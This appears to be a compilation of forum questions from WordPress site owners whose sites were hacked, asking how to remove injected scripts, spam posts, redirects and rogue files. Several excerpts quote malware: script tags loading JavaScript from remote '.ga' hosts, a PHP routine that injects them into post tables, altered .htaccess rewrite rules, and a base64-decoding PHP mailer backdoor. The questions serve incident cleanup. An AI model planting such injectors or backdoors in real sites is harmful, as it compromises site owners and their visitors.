Site has been hacked, and all posts have had a line of JS code injected under the content! <script src='https://js.xxxxxxx.ga/stat.js?n=ns1' type='text/javascript'></script> I have found the malware file in the root directory, which injects the JS code with the command: $q = "SELECT TABLE_SCHEMA,TABLE_NAME FROM information_schema.TABLES WHERE `TABLE_NAME` LIKE '%post%'"; $result = $conn->query($q); if ($result->num_rows > 0) { while($row = $result->fetch_assoc()) { $q2 = "SELECT post_content FROM " . $row["TABLE_SCHEMA"]. "." . $row["TABLE_NAME"]." LIMIT 1 "; $result2 = $conn->query($q2); if ($result2->num_rows > 0) …
I do have a problem on my WordPress site. In the frontend there is a spam post (not a comment, a post) visible to everybody. I don't know where it comes from and all malware scans were negative so far. However, in order to solve this problem I will need to delete this post. But it can't be seen in the backend. As you can see on the given screenshot the posts area shows "all posts" with the number of …
Today we noticed that one of our websites has started showing random Google Ads when we have not added any Google Ads to our website. I would appreciate it if someone could help in case they have faced such a scenario. I am not sure at this point if the website is hacked or the shared hosting server is compromised. Are there any pointers or steps I should follow to get rid of these ads on the website?
I have been searching this site's posts about blogs being hacked, but I haven't found anything like this. One of our Editor's account has started to publish random posts. Our first thought was his password being stolen, so we changed it and we told him not to log in for a certain time. Random posts appeared again the next day. We tried yesterday to change his role to Subscriber, so he doesn't have permission to post. Random posts …
In many WordPress websites the functions.php file is automatically erased. I checked every file. I scanned the files on the server but no file is infected. After an interval of time the website responds with a white page; when I checked functions.php it was empty. Why is this happening? Is it a server problem?
I've been doing WP for over a decade now, and have fixed / remediated my share of hacks. However this one really has me stumped.. I have a site running on updated, patched, and pretty darn secure WordPress. For context, it used to NOT be so secure before I took over hosting it. It used an old theme, Experon Pro (this will come into play later) before I rebuilt it in 2020. Now to the hack -- The site has …
I have recently migrated several sites to a new server using easyengine, which created a separate set of docker images for each WP website. Internally on my server, each of these sites gets a private IP (172.x.x.x) and externally of course domains are routed via dns to the external server named and served up normally. I noticed that a couple of my migrated sites are experiencing failed logins (shown in the activity log plugin) that have no referrer and seem …
I'm trying to clean up a WordPress website that's been hacked. I noticed that the .htaccess file has some suspect looking regular expressions, but my regex skills are pretty weak (time to learn I guess). I've tried replacing the .htaccess file with the default WordPress .htaccess, but it gets rewritten immediately and automatically. What I need to know is what's going on with this code: # BEGIN WordPress <IfModule mod_rewrite.c> RewriteEngine On RewriteBase / RewriteRule ^([^\d\/]+)-([0-9]+)-([0-9]+)-.*..*$ ?$1$3=$2&%{QUERY_STRING}[L] RewriteRule ^([0-9]+)\/([^\d\/]+)([0-9]+)=[0-9]+$ ?$2$1=$3&%{QUERY_STRING}[L] …
I was about to submit my WordPress auto-generated sitemap to Google Search Console but I realized my sitemap contains weird links and it doesn't contain any of my actual pages. I checked example.com/sitemap.xml and example.com/wp-sitemap.xml and example.com/sitemap_index.xml. They all contain different weird links like: <url> <loc>https://example.com/armrests71n79/jsxc93911899.htm</loc> </url> <url> <loc>https://example.com/ferocebotc/iq39894629.htm</loc> </url> <url> <loc>https://example.com/hairspraysp6/ekqpmh46441760.htm</loc> </url> And this is just 3 of them. There are almost 1000 links like this and my site actually has just 27 pages. Extra information: I received …
I am very sorry about the length of the post, please bear with me as I am going to try and list everything I've done so far. I am dealing with a hacked WordPress site which had been left without updates for quite a while now and the passwords were weak.. Also, no backups. The website uses Enfold Theme. So here goes! I've deleted most of the plugins. Among the ones that remain are Fastest cache, which was there, plus …
In my 13 years of WordPress, I've never seen anything like this. About an hour ago I was alerted by one of my users that the website was displaying an Internal Server Error 500 message on every page. I consulted my host's tech support, and they were unable to determine the cause. I then noticed that I had about 20 comments in the moderation queue, all of which are very suspicious (see screenshot). I have no idea what to do. …
Website has been hacked and they have injected JavaScript into every single post, page and product (WooCommerce). Editing every page manually would take forever; we have over 3000 posts. Is there a simple find and replace we could use to remove this JavaScript?
My WordPress site got hacked. I fixed the problem but had to delete the TwentyFifteen theme (the one that was hacked). The theme I was originally using was different, but the hackers hacked the TwentyFifteen theme. When I deleted the theme, I went back to the WordPress dashboard and saw this: As you can see it's not recognizing any theme and I can't activate them. Also the homepage is blank. Any ideas on how to activate a theme via FTP? …
My WordPress website has been hacked; once recovered, I can't seem to view the footer. I have checked the theme options / widgets and the settings seem fine. Kindly advise on possible causes and solutions. Website address: www.boltonuniform.co.za
I have a website built on WordPress. The URL is www.travelmakerismymiddlename.com. At some point, the website started redirecting randomly - I cannot tell you which link or page specifically redirects, as it is completely random. The issue is, I have tried everything that I know of, and it still redirects. The latest thing I have tried is downloading the files from the host server and scanning them for malware. I tried Malwarebytes but no malware was found. I could not …
I want to add a security feature to my WordPress website to stop direct access to files added to the root of the WordPress installation. Recently I discovered that a malicious plugin added some files to send email. Below is the malicious PHP code added. <?php $method = $_SERVER['REQUEST_METHOD']; switch ($method) { case 'GET': //Here Handle GET Request echo '###ERROR 404'; exit; break; case 'POST': //Here Handle POST Request foreach($_POST as $key => $x_value) { $data = base64_decode($x_value) ; $to_data = …
After a site of a friend was hacked I told him he should just clean up the mess and restart from scratch so he knows that no file has been altered. I could scan the site for him with tools like grep and so on (For a start: Grep and Friends) but what I wondered about is, how to scan the database? What if some hacker has placed a payload inside the database? It can be something simple like XSS or …
My WordPress site has been hacked and every post has had <script src='https://crow.lowerthenskyactive.ga/m.js?n=ns1' type='text/javascript'></script> added to the end of each post, which I need to remove. I have 375 posts I need this removing from. I have tried UPDATE wp_posts SET post_content = REPLACE (post_content, '<p style="text-align: center;"><img src="http://i.imgur.com/picture.jpg" alt="" /></p>', ''); from the How to mass delete one line from all posts and substituted it with the following query. I'm thinking it has something to do with the ' …
I would like to inform and request help from the community. What happens is this malware was in the folder /wp-content/uploads/2020/ named index.php, and I found it in the year 2017 in the uploads folder. What I find strange is that it was not detectable by any online database and not even by the Sucuri plugin or Wordfence. The code follows (a good part of it was deleted, because it did not fit in the post). Below …
I am using the 'WP Offload SES Lite' plugin to collect questions and answers through forms. But yesterday I was receiving thousands of mails continuously in a single day. I think someone tried to hack the site. Can you please tell me how to protect against these kinds of attacks?